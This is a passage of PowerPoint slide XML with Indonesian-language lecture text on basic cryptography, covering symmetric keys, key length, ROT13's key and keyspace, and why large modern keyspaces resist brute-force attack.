            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>persis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berdua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengetahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="0" dirty="0"/>
              <a:t>Panjang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="0" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="0" dirty="0"/>
              <a:t> / Key Length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> proses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>substitusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ROT13, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menyadari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kuncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 13. Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 17 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ciphertext yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>masih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>Ruang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>rentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ROT13, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>keyspace-nya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 25 (ROT1. . . ROT25). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ROT0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ROT26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> ciphertext yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>identik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> plaintext. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 26 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggeser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>alfabet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>rentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> 1-25. ROT0 dan ROT26+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>lemah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="0" i="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>Cipher modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ruang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>terdapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>triliunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kuncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>ditemukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kriptanalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> brute force. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>Analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>kriptanalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>cipherteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" i="0" dirty="0"/>
              <a:t> </a:t>
